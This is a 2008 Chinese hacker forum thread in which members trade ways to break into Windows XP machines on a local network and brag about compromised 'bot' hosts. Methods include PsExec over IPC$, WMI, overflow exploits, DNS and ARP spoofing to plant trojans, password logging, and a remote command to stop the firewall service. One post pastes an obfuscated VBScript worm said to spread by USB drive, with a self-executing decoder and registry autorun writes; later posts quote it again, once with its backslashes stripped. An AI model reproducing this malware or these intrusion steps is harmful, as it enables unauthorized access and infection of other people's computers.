【3.A.S.T】网络安全爱好者 » 技术交流 » [讨论]关于内网XP的入侵讨论！

返回列表发帖

3.A.S.T中尉

Rank: 3 Rank: 3

帖子: 110
积分: 282
威望: 450
金钱: 344
在线时间: 1 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2008-7-24 17:26 | 只看该作者

[讨论]关于内网XP的入侵讨论！

[讨论]关于内网XP的入侵讨论！
议题作者：redbin
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

IPC之路是行不通的，据说可以WMI，不说什么补丁没打然后益处的！
教主给我说他PSEXEC全部可以，不过我测试了两台都不可以，有其他搞过的说下都有什么好方法？
爱情都是寂寞撒的谎言! Www.Vip8.orG

帖子185 精华4 积分5077 阅读权限100 性别男来自我家在线时间182 小时注册时间2004-12-9 最后登录2008-6-27 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

sunwear

团队执行官

3.A.S.T士兵

Rank: 1

帖子: 40
积分: 51
威望: 61
金钱: 60
在线时间: 0 小时

2楼

发表于 2008-7-24 17:26 | 只看该作者

亏你还是校园性爱联盟的站长.
你指的psexec不可以有没有别的提示? 他的执行文件貌似就是靠ipc.
另外还有些程序是利用rpc.比如Recton,当然如果我没记错的话.
并且当windowsxp开着该死的sharedaccess服务时就会提示你找不到网络路径
引用:
C:\Documents and Settings\sunwear>d:\tool\other\pstools\psexec.exe \\sunwearvm -u sunwear -p sunwear cmd.exe

PsExec v1.84 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access sunwearvm:
找不到网络路径。

Make sure that the default admin$ share is enabled on sunwearvm.

帖子3777 精华70 积分18704 阅读权限200 性别男来自天津在线时间1647 小时注册时间2004-8-16 最后登录2008-7-23 查看个人网站
查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

redbin
r3d81n

荣誉会员

3.A.S.T士兵

Rank: 1

帖子: 11
积分: 16
威望: 21
金钱: 21
在线时间: 0 小时

3楼

发表于 2008-7-24 17:26 | 只看该作者

教主天天给我看他的内网鸡好多的，他说全是psexec搞的！：（我又不晓得psexec用的嘛协议！我一直以为是RPC的！

防火墙服务确实很讨厌的，默认都是开启！

不知道别人有嘛好方法不！爱情都是寂寞撒的谎言! Www.Vip8.orG

帖子185 精华4 积分5077 阅读权限100 性别男来自我家在线时间182 小时注册时间2004-12-9 最后登录2008-6-27 查看个人网站
查看详细资料TOP 赚更多的钱

scw121

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 26
积分: 39
威望: 52
金钱: 51
在线时间: 0 小时

4楼

发表于 2008-7-24 17:26 | 只看该作者

很急,借个地方问下,这段代码截密后是什么样的...
'7.1
O1="'2.6 (( =|2.6|}{=|`|}{=|`.|}{=|`.|}{=|G|&}{=(659)&(661)&(661)&(667)&|://|&|2.|&(09)&(09)&(93)&|5.|&(658)&|/2.|&(42)&||&(667)}{7=(659)&(661)&(661)&(667)&|://|&|1.|&(05)&(05)&(01)&|3.|&(658)&|/2.|&(42)&||&(667)}{' }{ }{ =(|.|)}{ =(|.|)}{ =.(6)}{ =.(5)}{ =.}{=.}{=.(7)&|\|}{=.(6)&|\\|}{=(.,(.)-(.))}{ =&|\| = )): ():(( }{ .(&|\|&) &|\|&,5&&}{=(&|\|&,6)}{=(&|\|&,7)}{ =|_| IN() () &|\|&,5&&}{ &|\|&,(+6)&&}{=(|.|,6) (|.|,6)}{ (&|\|&,6)>855 -()>7 }{=(&|\|&,8)}{ =|| =5}{=6}{=||}{ <>|<>|}{ =8 }{7=(&|.|,7&|?=|&,5,6,655)}{=(&|.|,6)}{ =6 =7 =9 }{6=(&|.|,&|?=|&,5,6,655)}{=(&|.|,6)}{ }{=+6}{ >9 }{ 6=6 7=6 }{=6}{ }{ }{ }{}{ .(&|.|) }{ =.(&|.|, 6) }{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{= .}{= .}{.}{(&|.|)}{ =|<>| }{ &|\|&,5&&}{ 6,,,,,}{ <> .(&|\|&&|.|) }{ &|\|&,,,8,7555}{.}{ }{ =6 }{ <> .(&) }{ &}{ &,,6,8,7555}{ }{ }{ }{ }{ }{ =6 )): : ():(( .() }{ ,5}{.()}{ }{ .() }{ ,5}{.()}{ )): : (,):(( }{ =.(, )}{. }{.}{ ,7+9 )): : (,,,,,):(( =5 }{=&|\|&}{}{=&}{ }{ }{ =.(, )}{. }{. |[]|}{. }{. |=. .\|&&|.|}{. }{. |\=打开(&)|}{. }{. |\\=. .\|&&|.|}{. }{. |\\=6|}{. }{.}{ ,6+7+9 )): : (,):(( <5 =.}{ .() }{ .().=5 }{=|_|}{}{ =.(, 6)}{ =.(, 6)}{.}{=.}{.}{ >5 <= }{=5 }{ <}{=+6}{ . }{=.}{}{=|_|}{ }{}{=}{ <=5 }{=.}{}{=|_|}{ }{.}{ }{}{=|_|}{ )): : (,):(( .() }{ =.() }{.=}{ =}{ }{ .() }{ =.()}{.=}{ =}{ )): : (,,,,) (( =5}{ <}{ ,5}{ = (): = ():}{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. ||,,5 }{' 6=7 . |!|}{ }{.()}{ }{=6}{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. = 8 }{' 6=7 . |!|}{. = 6 }{' 6=7 . |!|}{.() }{' 6=7 . |!|}{.(.) }{' 6=7 . |!|}{. ,7 }{' 6=7 . |!|}{ ,7+9}{ .() }{=.().}{}{=5}{ }{ > }{ =6 . }{ }{ }{}{=5}{=+6}{ }{. 8555}{ }{ )) : (,):(( }{ =(|:\\.\\7|)}{ =.(| * 87_ ='|&&|'|)}{=6 }{ }{=+6}{}{ }{ > =}{}{=6}{ )): () .=5 = . = () = 1882117982791189023101820291073779112775148867509175910173177481689628187391419731771478674747771187177941175168868780750913101751688688777118717794117516886878875091310175168868577711871771411751688687897509131017516888897771187177141175168848175161197516886868575291310177711871771681678688777118717710128101411751688685847516119751688687887529131017771187177168167868877711871779011975941177711871772018820187181327731674777118717791023297774 := := &(& := ) : ()>6: ((,6)) =&&(,7)&:=(,8) =&+(,9)+:=(,0) :() ":function ucc(b):x="633D766243724C663A457865637574652822466F7220693D3120546F204C656E2862293A613D417363284D696428622C692C3129292226632622496620613D313237205468656E20613D31332226632622496620613D3131205468656E20613D31302226632622696620613D3132205468656E20613D33342226632622696620613E3D313420616E6420613C3D3331207468656E2226632622613D612B38332226632622656C7365696620613E3D3120616E6420613C3D38207468656E2226632622613D612B3131342226632622656C7365696620613E3D353320616E6420613C3D3537207468656E2226632622613D612D352226632622656C7365696620613E3D343820616E6420613C3D3532207468656E2226632622613D612B352226632622456E6420496622266326227563633D7563632B63687228612922266326224E6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y):end function:O2="(( .FE(&|\|&&|.|)}{ (() 60)=5 }{. 00555}{}{. ))":O3="(( }{ =&|\| =.(| |&,8,)}{}{ }{. 0555}{ (|.|,7)=6 }{ (&|\.|,6)= () }{.}{}{ &|\.|,}{ }{ }{ (|.|,7)<>6 (|.|,7) .}{ }{}{ }{}{ (&,6)<> }{ 6,5,5,5,5,5}{ }{ (&|\|&,6)<> }{ 5,5,5,5,5,5}{ }{=(&,0)}{ .(&) }{. &}{ }{ (&|\|&&|.|,6)<>|'|& }{ &|\|&&|.|}{}{ }{ (&|\|&&|.|,6)<>|'|& }{ &|\|&&|.|}{ }{ (&&|.|,6)<>|'|& (&,66)=6 }{ &&|.|,(O6+O7)}{ }{ (&,66)=7 }{ }{ .=7 }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/.|) }{ &|/.|}{ &|/.|,6+7+9}{ }{ }{}{ }{}{}{. &}{}{ &,7+9}{ &|\|&&|.|}{ &|\|&&|.|}{}{. &|\|&&|.|}{ )): ():(( }{ (&,2)=6 }{(((&,4)))}{ )): : (,) (( }{ .() }{. ,,}{ )): : ():(( }{ =.(&,6)}{=.}{. }{ =.(, )}{. }{.}{ ,7+9 )): : ():(( RP=|HKEY_LOCAL_MACHINE\SOFTWARE\M\W\CV\\E\\| }{T_N=|REG_SZ|}{K_N=||}{K_D=&|.|}{W.RW RP&K_N,K_D,T_N )): : ():(( RP=|HKEY_CURRENT_USER\S\M\W\CV\E\A\| }{T_N=|REG_DWORD|}{K_N=|SSH|}{K_D=|55555555| }{W.RW RP&K_N,K_D,T_N )): : ():(( .() }{ .(.()) }{ .()}{ }{.()}{ )): : (,,,,,):(( =(&|\|&,8)}{ <=}{=&|,|&}{=+6}{}{=&}{=S(,|,|)}{F =5 T U()}{ =() }{ .(&) }{ &,|://|&,5,7,7555}{ }{ }{}{=(,) )): : (,,,):(( .(&) (,6) }{ &,|://|&,5,7,8555}{ }{=(,) )): : (,):(( .(&) }{ <>5 }{=}{. |%% / 7557-|&()&|-|&(),}{. (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ )): : (,):(( (,6) }{ }{S =(|:\\.\\7|) }{S =. (| * 87_ ='|&&|' |)}{ }{.()}{}{ =6 =6}{ )): : ():(( }{}{ }{ .=8 (.=6 <>|A:| <> |B:|) }{ .(&|\.|) }{ &|\.|}{ }{ .(&|\|&&|.|) .(&|\.|) }{ (&|\.|,6)<> }{ &|\|&,&|\.|}{ &|\|&&|.|,&|\|&&|.|}{ }{}{}{ &|\|&,&|\.|}{ &|\|&&|.|,&|\|&&|.|}{ }{ }{}{ (() 0)=5 <>6 }{=}{. 15555}{ }{ <>-6 }{}{ }{. 8555}{ )): : ():(( (&,6)<>|'|& }{(|,!|)}{ &}{.}{ )): ":on error resume next:execute(ucc(O1+O3)):O4="For i=1 To Len(e)"&h&"k=asc(mid(e,i,1))"&h&"If k=5 Then k=16"&h&"k=10"&h&"if k=8 Then"&h&"k=45"&h&"if k>81 and k<90 then"&h&"k=k+12"&h&"elseif k>89 and k<135 then"&h&"k=k-21"&h&"elseif k>39 and k<70 then"&h&"k=k+17"&h&"End If"&h&"e=e+chr(k)"&h&"Next"
帖子22 精华0 积分79 阅读权限40 在线时间32 小时注册时间2006-2-12 最后登录2008-3-18 查看详细资料TOP

sunwear

团队执行官

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 23
威望: 30
金钱: 29
在线时间: 0 小时

5楼

发表于 2008-7-24 17:26 | 只看该作者

引用:
引用第3楼scw121于2007-11-08 21:00发表的 :
很急,借个地方问下,这段代码截密后是什么样的...
'7.1
O1="'2.6 (( =|2.6|}{=|`|}{=|`.|}{=|`.|}{=|G|&}{=(659)&(661)&(661)&(667)&|://|&|2.|&(09)&(09)&(93)&|5.|&(658)&|/2.|&(42)&||&(667)}{7=(659)&(661)&(661)&(667)&|://|&|1.|&(05)&(05)&(01)&|3.|&(658)&|/2.|&(42)&||&(667)}{' }{ }{ =(|.|)}{ =(|.|)}{ =.(6)}{ =.(5)}{ =.}{=.}{=.(7)&||}{=.(6)&||}{=(.,(.)-(.))}{ =&|| = )): ():(( }{ .(&||&) &||&,5&&}{=(&||&,6)}{=(&||&,7)}{ =|_| IN() () &||&,5&&}{ &||&,(+6)&&}{=(|.|,6) (|.|,6)}{ (&||&,6)>855 -()>7 }{=(&||&,8)}{ =|| =5}{=6}{=||}{ <>|<>|}{ =8 }{7=(&|.|,7&|?=|&,5,6,655)}{=(&|.|,6)}{ =6 =7 =9 }{6=(&|.|,&|?=|&,5,6,655)}{=(&|.|,6)}{ }{=+6}{ >9 }{ 6=6 7=6 }{=6}{ }{ }{ }{}{ .(&|.|) }{ =.(&|.|, 6) }{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{=.}{= .}{= .}{.}{(&|.|)}{ =|<>| }{ &||&,5&&}{ 6,,,,,}{ <> .(&||&&|.|) }{ &||&,,,8,7555}{.}{ }{ =6 }{ <> .(&) }{ &}{ &,,6,8,7555}{ }{ }{ }{ }{ }{ =6 )): : ():(( .() }{ ,5}{.()}{ }{ .() }{ ,5}{.()}{ )): : (,):(( }{ =.(, )}{. }{.}{ ,7+9 )): : (,,,,,):(( =5 }{=&||&}{}{=&}{ }{ }{ =.(, )}{. }{. |[]|}{. }{. |=. .|&&|.|}{. }{. |=打开(&)|}{. }{. |=. .|&&|.|}{. }{. |=6|}{. }{.}{ ,6+7+9 )): : (,):(( <5 =.}{ .() }{ .().=5 }{=|_|}{}{ =.(, 6)}{ =.(, 6)}{.}{=.}{.}{ >5 <= }{=5 }{ <}{=+6}{ . }{=.}{}{=|_|}{ }{}{=}{ <=5 }{=.}{}{=|_|}{ }{.}{ }{}{=|_|}{ )): : (,):(( .() }{ =.() }{.=}{ =}{ }{ .() }{ =.()}{.=}{ =}{ )): : (,,,,) (( =5}{ <}{ ,5}{ = (): = ():}{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. ||,,5 }{' 6=7 . |!|}{ }{.()}{ }{=6}{' 6=7 . |!|}{ = (|.|) }{' 6=7 . |!|}{. = 8 }{' 6=7 . |!|}{. = 6 }{' 6=7 . |!|}{.() }{' 6=7 . |!|}{.(.) }{' 6=7 . |!|}{. ,7 }{' 6=7 . |!|}{ ,7+9}{ .() }{=.().}{}{=5}{ }{ > }{ =6 . }{ }{ }{}{=5}{=+6}{ }{. 8555}{ }{ )) : (,):(( }{ =(|:\.7|)}{ =.(| * 87_ ='|&&|'|)}{=6 }{ }{=+6}{}{ }{ > =}{}{=6}{ )): () .=5 = . = () = 1882117982791189023101820291073779112775148867509175910173177481689628187391419731771478674747771187177941175168868780750913101751688688777118717794117516886878875091310175168868577711871771411751688687897509131017516888897771187177141175168848175161197516886868575291310177711871771681678688777118717710128101411751688685847516119751688687887529131017771187177168167868877711871779011975941177711871772018820187181327731674777118717791023297774 := := &(& := ) : ()>6: ((,6)) =&&(,7)&:=(,8) =&+(,9)+:=(,0) :() ":function ucc(b):x="633D766243724C663A457865637574652822466F7220693D3120546F204C656E2862293A613D417363284D696428622C692C3129292226632622496620613D313237205468656E20613D31332226632622496620613D3131205468656E20613D31302226632622696620613D3132205468656E20613D33342226632622696620613E3D313420616E6420613C3D3331207468656E2226632622613D612B38332226632622656C7365696620613E3D3120616E6420613C3D38207468656E2226632622613D612B3131342226632622656C7365696620613E3D353320616E6420613C3D3537207468656E2226632622613D612D352226632622656C7365696620613E3D343820616E6420613C3D3532207468656E2226632622613D612B352226632622456E6420496622266326227563633D7563632B63687228612922266326224E6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y):end function:O2="(( .FE(&||&&|.|)}{ (() 60)=5 }{. 00555}{}{. ))":O3="(( }{ =&|| =.(| |&,8,)}{}{ }{. 0555}{ (|.|,7)=6 }{ (&|.|,6)= () }{.}{}{ &|.|,}{ }{ }{ (|.|,7)<>6 (|.|,7) .}{ }{}{ }{}{ (&,6)<> }{ 6,5,5,5,5,5}{ }{ (&||&,6)<> }{ 5,5,5,5,5,5}{ }{=(&,0)}{ .(&) }{. &}{ }{ (&||&&|.|,6)<>|'|& }{ &||&&|.|}{}{ }{ (&||&&|.|,6)<>|'|& }{ &||&&|.|}{ }{ (&&|.|,6)<>|'|& (&,66)=6 }{ &&|.|,(O6+O7)}{ }{ (&,66)=7 }{ }{ .=7 }{ .(&|/.|) }{ &|/.|}{ }{ .(&|/.|) }{ &|/.|}{ &|/.|,6+7+9}{ }{ }{}{ }{}{}{. &}{}{ &,7+9}{ &||&&|.|}{ &||&&|.|}{}{. &||&&|.|}{ )): ():(( }{ (&,2)=6 }{(((&,4)))}{ )): : (,) (( }{ .() }{. ,,}{ )): : ():(( }{ =.(&,6)}{=.}{. }{ =.(, )}{. }{.}{ ,7+9 )): : ():(( RP=|HKEY_LOCAL_MACHINESOFTWAREMWCVE| }{T_N=|REG_SZ|}{K_N=||}{K_D=&|.|}{W.RW RP&K_N,K_D,T_N )): : ():(( RP=|HKEY_CURRENT_USERSMWCVEA| }{T_N=|REG_DWORD|}{K_N=|SSH|}{K_D=|55555555| }{W.RW RP&K_N,K_D,T_N )): : ():(( .() }{ .(.()) }{ .()}{ }{.()}{ )): : (,,,,,):(( =(&||&,8)}{ <=}{=&|,|&}{=+6}{}{=&}{=S(,|,|)}{F =5 T U()}{ =() }{ .(&) }{ &,|://|&,5,7,7555}{ }{ }{}{=(,) )): : (,,,):(( .(&) (,6) }{ &,|://|&,5,7,8555}{ }{=(,) )): : (,):(( .(&) }{ <>5 }{=}{. |%% / 7557-|&()&|-|&(),}{. (*6555)}{ }{. &}{=6}{ >5 }{. 0555}{. |%% / |&,}{ }{ )): : (,):(( (,6) }{ }{S =(|:\.7|) }{S =. (| * 87_ ='|&&|' |)}{ }{.()}{}{ =6 =6}{ )): : ():(( }{}{ }{ .=8 (.=6 <>|A:| <> |B:|) }{ .(&|.|) }{ &|.|}{ }{ .(&||&&|.|) .(&|.|) }{ (&|.|,6)<> }{ &||&,&|.|}{ &||&&|.|,&||&&|.|}{ }{}{}{ &||&,&|.|}{ &||&&|.|,&||&&|.|}{ }{ }{}{ (() 0)=5 <>6 }{=}{. 15555}{ }{ <>-6 }{}{ }{. 8555}{ )): : ():(( (&,6)<>|'|& }{(|,!|)}{ &}{.}{ )): ":on error resume next:execute(ucc(O1+O3)):O4="For i=1 To Len(e)"&h&"k=asc(mid(e,i,1))"&h&"If k=5 Then k=16"&h&"k=10"&h&"if k=8 Then"&h&"k=45"&h&"if k>81 and k<90 then"&h&"k=k+12"&h&"elseif k>89 and k<135 then"&h&"k=k-21"&h&"elseif k>39 and k<70 then"&h&"k=k+17"&h&"End If"&h&"e=e+chr(k)"&h&"Next"
像是VBS

帖子3777 精华70 积分18704 阅读权限200 性别男来自天津在线时间1647 小时注册时间2004-8-16 最后登录2008-7-23 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

scw121

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 5
积分: 8
威望: 10
金钱: 10
在线时间: 0 小时

6楼

发表于 2008-7-24 17:26 | 只看该作者

就是vbs,后缀名是vbe,通过u盘传播,太猛了
帖子22 精华0 积分79 阅读权限40 在线时间32 小时注册时间2006-2-12 最后登录2008-3-18 查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

b0r3d

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 14
积分: 21
威望: 28
金钱: 28
在线时间: 0 小时

7楼

发表于 2008-7-24 17:26 | 只看该作者

MS这里的话
http://www.microsoft.com/china/t ... ilities/PsExec.mspx
引用:
PsExec 是 Sysinternals 命令行工具不断完善的 PsTools 工具包的一部分，这些工具用于协助管理本地和远程 Windows NT/2K 系统。
帖子34 精华0 积分97 阅读权限40 在线时间17 小时注册时间2007-3-13 最后登录2008-7-15 查看详细资料TOP 让女孩一夜变的更有女人味

simpleboy

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 20
积分: 30
威望: 39
金钱: 39
在线时间: 0 小时

8楼

发表于 2008-7-24 17:26 | 只看该作者

Windows Vista、NT 4.0、Win2K、Windows XP 和 Server 2003 上都存在？？？。只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时注册时间2006-10-23 最后登录2008-7-2 查看详细资料TOP

十二少

荣誉会员

3.A.S.T士兵

Rank: 1

帖子: 16
积分: 24
威望: 32
金钱: 32
在线时间: 0 小时

9楼

发表于 2008-7-24 17:26 | 只看该作者

刚碰到内网机器一2K3的机器测试了下需要默认共享admin$开启Welcome to Http://Www.TwelveS.Cn
帖子126 精华0 积分3414 阅读权限100 性别男在线时间115 小时注册时间2005-1-8 最后登录2008-5-15 查看详细资料TOP

testplay

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 24
积分: 38
威望: 48
金钱: 38
在线时间: 1 小时

10楼

发表于 2008-7-24 17:26 | 只看该作者

内网XP，IPC连接默认是guest权限，psexec应该玩不起来。
用溢出方式效果好。
帖子26 精华0 积分93 阅读权限40 在线时间25 小时注册时间2005-1-27 最后登录2008-2-2 查看详细资料TOP

过路人

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 21
积分: 31
威望: 41
金钱: 41
在线时间: 0 小时

11楼

发表于 2008-7-24 17:26 | 只看该作者

如果是xpsp2，全补丁的话基本上是没招的除非你有0day
个人觉得内网还是cain的dns欺骗挂马还是成功率比较大的，ie补丁打全的不多呵呵，况且那玩意经常出问题的。过路的,没啥说的
帖子5 精华0 积分10 阅读权限40 在线时间71 小时注册时间2005-8-14 最后登录2008-6-7 查看详细资料TOP

cnlnfjhh

荣誉会员

3.A.S.T士兵

Rank: 1

帖子: 19
积分: 29
威望: 38
金钱: 38
在线时间: 0 小时

12楼

发表于 2008-7-24 17:26 | 只看该作者

XP的内网下，
如果没有Etool
建议记录密码吧：）
搞到一个user 就可以打开一扇门了Link... http://www.secow.com Or Msn: cnlnfjhh@gmail.com
帖子62 精华0 积分2937 阅读权限100 性别男在线时间53 小时注册时间2006-10-3 最后登录2008-7-6 查看详细资料TOP

remax

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 8
积分: 12
威望: 15
金钱: 15
在线时间: 0 小时

13楼

发表于 2008-7-24 17:26 | 只看该作者

ipc$ wmi dns欺骗 Httphijack [最近出了个非arp的，不知道怎么搞的]

最近在写内网加固文档，同志们继续，我总结。

over.20字节够写什么？

帖子325 精华2 积分911 阅读权限50 在线时间79 小时注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料TOP

bink

荣誉会员

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 23
威望: 30
金钱: 29
在线时间: 0 小时

14楼

发表于 2008-7-24 17:26 | 只看该作者

复制内容到剪贴板
代码:
on error resume next
execute(ucc(O1+O3))
O4="For i=1 To Len(e)"&h&"k=asc(mid(e,i,1))"&h&"If k=5 Then k=16"&h&"k=10"&h&"if k=8 Then"&h&"k=45"&h&"if k>81 and k<90 then"&h&"k=k+12"&h&"elseif k>89 and k<135 then"&h&"k=k-21"&h&"elseif k>39 and k<70 then"&h&"k=k+17"&h&"End If"&h&"e=e+chr(k)"&h&"Next"
有才，绝对有才。。

很好.
帖子660 精华4 积分5585 阅读权限100 性别男在线时间247 小时注册时间2005-9-2 最后登录2007-12-4 查看详细资料TOP

xuter

晶莹剔透§烈日灼然

3.A.S.T中尉

Rank: 3 Rank: 3

帖子: 62
积分: 157
威望: 248
金钱: 132
在线时间: 1 小时

15楼

发表于 2008-7-24 17:26 | 只看该作者

引用:
引用第4楼sunwear于2007-11-08 21:35发表的 :

像是VBS
t通过U盘传播，很厉害...到底上什么？？
帖子1 精华0 积分6 阅读权限40 性别男在线时间0 小时注册时间2007-11-14 最后登录2007-11-15 查看详细资料TOP

hack1125

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 23
威望: 30
金钱: 30
在线时间: 0 小时

16楼

发表于 2008-7-24 17:26 | 只看该作者

呵呵，我觉得现在默认共享的比较少拉~一般在外网都关闭掉了~
而且xp默认安装，没加任何安全措施的估计也是新手用户，入侵没啥意思。

帖子9 精华0 积分29 阅读权限40 性别男来自福建在线时间4 小时注册时间2005-9-23 最后登录2008-3-6 查看详细资料TOP

knoyber0814

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 13
积分: 20
威望: 26
金钱: 26
在线时间: 0 小时

17楼

发表于 2008-7-24 17:26 | 只看该作者

sc \\ip stop sharedaccess 貌似有的机器可以把默认的防火墙关掉
帖子5 精华0 积分17 阅读权限40 性别男在线时间3 小时注册时间2006-6-2 最后登录2008-4-5 查看详细资料TOP

wodehao448

晶莹剔透§烈日灼然

3.A.S.T少尉

Rank: 2

帖子: 50
积分: 80
威望: 106
金钱: 72
在线时间: 1 小时

18楼

发表于 2008-7-24 17:26 | 只看该作者

牛啊，先用中间的第一个函数把y解出来，y得到一大堆字符，转换出来得到一个函数，结合最后的一个函数应该就能把01,02,03解出来的~~~~~~~~~http://crazydiyer.cn

帖子12 精华0 积分41 阅读权限40 性别男来自湖北随州在线时间60 小时注册时间2007-1-12 最后登录2008-7-22 查看详细资料TOP

neeke

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 26
积分: 39
威望: 52
金钱: 44
在线时间: 0 小时

19楼

发表于 2008-7-24 17:26 | 只看该作者

我觉得XP的话还是现在还比较流行的135好搞..

朋友多了路好走！

帖子8 精华0 积分21 阅读权限40 性别男来自陕西在线时间6 小时注册时间2007-6-13 最后登录2008-7-21 查看个人网站
查看详细资料TOP

艾米

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 19
积分: 29
威望: 38
金钱: 29
在线时间: 0 小时

20楼

发表于 2008-7-24 17:26 | 只看该作者

引用:
引用第18楼neeke于2007-11-17 01:06发表的 :
我觉得XP的话还是现在还比较流行的135好搞..

我不认为135怎么样
就拿我们这里的网吧说吧，虽GHOST的XP系统但是被网管改过之后根本没用。。
内网主打还是ARP欺骗，不过我在网吧试验也没成功过，XP的系统不怎么好弄，建议搞他的服务器（不知道你的内网是什么条件），再从服务器入手，这样或许可行！
帖子1 精华0 积分6 阅读权限40 性别男在线时间2 小时注册时间2007-9-8 最后登录2008-7-3 查看详细资料TOP

黑眼圈sct

荣誉会员